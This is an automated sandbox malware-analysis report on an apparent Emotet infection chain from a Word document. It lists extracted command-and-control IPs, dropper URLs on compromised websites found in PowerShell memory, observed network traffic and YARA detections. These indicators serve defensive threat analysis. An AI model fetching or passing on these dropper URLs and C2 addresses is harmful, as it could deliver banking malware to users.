Source: Malware configuration extractor	IPs: 201.185.69.28:443
Source: Malware configuration extractor	IPs: 167.71.148.58:443
Source: Malware configuration extractor	IPs: 192.175.111.212:7080

Potential dropper URLs found in powershell memory

Show sources

Source: powershell.exe, 00000004.00000002.2172542590.000000001CD40000.00000002.00000001.sdmp	String found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
Source: powershell.exe, 00000004.00000002.2172542590.000000001CD40000.00000002.00000001.sdmp	String found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
Source: powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	String found in memory: http://riandutra.com/email/AfhE8z0/
Source: powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	String found in memory: http://calledtochange.org/CalledtoChange/8huSOd/
Source: powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	String found in memory: https://mrveggy.com/wp-admin/n/
Source: powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	String found in memory: https://norailya.com/drupal/retAl/
Source: powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	String found in memory: https://hbprivileged.com/cgi-bin/Qg/
Source: powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	String found in memory: https://ummahstars.com/app_old_may_2018/assets/wDL8x/
Source: powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	String found in memory: https://www.teelekded.com/cgi-bin/LPo/
Source: powershell.exe, 00000004.00000002.2172946640.000000001CF27000.00000002.00000001.sdmp	String found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
Source: powershell.exe, 00000004.00000002.2172946640.000000001CF27000.00000002.00000001.sdmp	String found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
Source: powershell.exe, 00000004.00000002.2172946640.000000001CF27000.00000002.00000001.sdmp	String found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
Source: powershell.exe, 00000004.00000002.2172946640.000000001CF27000.00000002.00000001.sdmp	String found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
Source: powershell.exe, 00000004.00000002.2172946640.000000001CF27000.00000002.00000001.sdmp	String found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
Source: powershell.exe, 00000004.00000002.2172946640.000000001CF27000.00000002.00000001.sdmp	String found in memory: Do you want to switch to it now?
Source: powershell.exe, 00000004.00000002.2172946640.000000001CF27000.00000002.00000001.sdmp	String found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA

Source: unknown

Network traffic detected: IP country count 33

Source: global traffic

TCP traffic: 192.168.2.22:49176 -> 51.255.203.164:8080

Source: global traffic

HTTP traffic detected: GET /email/AfhE8z0/ HTTP/1.1Host: riandutra.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 81.214.253.80 81.214.253.80
Source: Joe Sandbox View	IP Address: 78.206.229.130 78.206.229.130

Source: Joe Sandbox View	ASN Name: TTNETTR TTNETTR
Source: Joe Sandbox View	ASN Name: RACKRAYUABRakrejusLT RACKRAYUABRakrejusLT

Source: Joe Sandbox View

JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: unknown	HTTPS traffic detected: 177.12.170.95:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 35.163.191.195:443 -> 192.168.2.22:49174 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 84.232.229.24
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164
Source: unknown	TCP traffic detected without corresponding DNS query: 51.255.203.164

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4A898E07-B28F-4AE5-86AD-026C320EA73C}.tmp

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /email/AfhE8z0/ HTTP/1.1Host: riandutra.comConnection: Keep-Alive

Source: powershell.exe, 00000004.00000002.2172542590.000000001CD40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2173312518.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2170178939.0000000001DA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2181345656.0000000001C60000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000004.00000002.2170553513.000000001B490000.00000004.00000001.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: riandutra.com

Source: powershell.exe, 00000004.00000002.2158965365.0000000000404000.00000004.00000020.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp	String found in binary or memory: http://calledtochange.org
Source: powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	String found in binary or memory: http://calledtochange.org/CalledtoChange/8huSOd/
Source: powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	String found in binary or memory: http://certificates.godaddy.com/repository/0
Source: powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	String found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
Source: powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	String found in binary or memory: http://certs.godaddy.com/repository/1301
Source: powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: powershell.exe, 00000004.00000002.2158965365.0000000000404000.00000004.00000020.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: powershell.exe, 00000004.00000002.2170553513.000000001B490000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000004.00000002.2171039393.000000001B56F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000004.00000002.2171060185.000000001B57A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000004.00000002.2170676691.000000001B4E3000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdig2s1-1814.crl0
Source: powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
Source: powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
Source: powershell.exe, 00000004.00000002.2158965365.0000000000404000.00000004.00000020.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: powershell.exe, 00000004.00000002.2170809388.000000001B538000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000004.00000002.2171039393.000000001B56F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000004.00000002.2158992358.0000000000451000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: powershell.exe, 00000004.00000002.2170809388.000000001B538000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000004.00000002.2170553513.000000001B490000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab.
Source: powershell.exe, 00000004.00000002.2172542590.000000001CD40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2173312518.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2170178939.0000000001DA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2181345656.0000000001C60000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000004.00000002.2172542590.000000001CD40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2173312518.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2170178939.0000000001DA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2181345656.0000000001C60000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000004.00000002.2172946640.000000001CF27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2173539255.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2170596267.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2182318532.0000000001E47000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000004.00000002.2172946640.000000001CF27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2173539255.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2170596267.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2182318532.0000000001E47000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000004.00000002.2171039393.000000001B56F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000004.00000002.2170809388.000000001B538000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000004.00000002.2170809388.000000001B538000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000004.00000002.2170553513.000000001B490000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000004.00000002.2170809388.000000001B538000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000004.00000002.2171060185.000000001B57A000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000004.00000002.2171039393.000000001B56F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.godaddy.com/0
Source: powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.godaddy.com/02
Source: powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.godaddy.com/05
Source: powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0%
Source: powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp	String found in binary or memory: http://riandutra.com
Source: powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	String found in binary or memory: http://riandutra.com/email/AfhE8z0/
Source: powershell.exe, 00000004.00000002.2159574068.0000000002310000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000004.00000002.2173311963.000000001D2C0000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000004.00000002.2172946640.000000001CF27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2173539255.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2170596267.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2182318532.0000000001E47000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000004.00000002.2172946640.000000001CF27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2173539255.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2170596267.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2182318532.0000000001E47000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000004.00000002.2159574068.0000000002310000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2185682203.00000000027A0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000004.00000002.2171039393.000000001B56F000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000004.00000002.2171039393.000000001B56F000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000004.00000002.2172542590.000000001CD40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2173312518.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2170178939.0000000001DA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2181345656.0000000001C60000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000004.00000002.2172946640.000000001CF27000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2173539255.0000000001D87000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2170596267.0000000001F87000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2182318532.0000000001E47000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000004.00000002.2169933231.0000000003D00000.00000004.00000001.sdmp	String found in binary or memory: http://www.litespeedtech.com
Source: powershell.exe, 00000004.00000002.2172542590.000000001CD40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2173312518.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2170178939.0000000001DA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2181345656.0000000001C60000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000004.00000002.2158965365.0000000000404000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000004.00000002.2158965365.0000000000404000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000007.00000002.2181345656.0000000001C60000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	String found in binary or memory: https://certs.godaddy.com/repository/0
Source: powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp	String found in binary or memory: https://hbprivileged.com
Source: powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	String found in binary or memory: https://hbprivileged.com/cgi-bin/Qg/
Source: powershell.exe, 00000004.00000002.2170047084.0000000003D98000.00000004.00000001.sdmp	String found in binary or memory: https://hbprivileged.comhZ
Source: powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp	String found in binary or memory: https://mrveggy.com
Source: powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	String found in binary or memory: https://mrveggy.com/wp-admin/n/
Source: powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2169933231.0000000003D00000.00000004.00000001.sdmp	String found in binary or memory: https://norailya.com
Source: powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	String found in binary or memory: https://norailya.com/drupal/retAl/
Source: powershell.exe, 00000004.00000002.2164552148.0000000003326000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: powershell.exe, 00000004.00000002.2170553513.000000001B490000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp	String found in binary or memory: https://ummahstars.com
Source: powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	String found in binary or memory: https://ummahstars.com/app_old_may_2018/assets/wDL8x/
Source: powershell.exe, 00000004.00000002.2169281689.0000000003C19000.00000004.00000001.sdmp	String found in binary or memory: https://www.teelekded.com/cgi-bin/LPo/
Source: powershell.exe, 00000004.00000002.2164215407.0000000003051000.00000004.00000001.sdmp	String found in binary or memory: https://www.teelekded.com/cgi-bin/LPo/P

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0000000E.00000002.2259337398.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2196520380.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2280487586.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2237290824.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2205331752.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2205236491.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2193792895.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2227039929.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2249797577.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2269533338.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2218317405.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2237360892.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2170071042.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2180978806.0000000000390000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2227064696.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2270553779.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2248449232.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2280539965.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2346045466.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2216606355.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2193729394.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2281126017.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2206333470.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2216643199.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2258739528.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2180920287.0000000000370000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2348582119.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2346073042.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2258693813.0000000000110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2248357262.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2190752783.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2239757544.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2269461275.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2169962101.0000000000130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2228163956.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 13.2.rundll32.exe.4c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.370000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.370000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.210000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.390000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.130000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.110000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.110000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
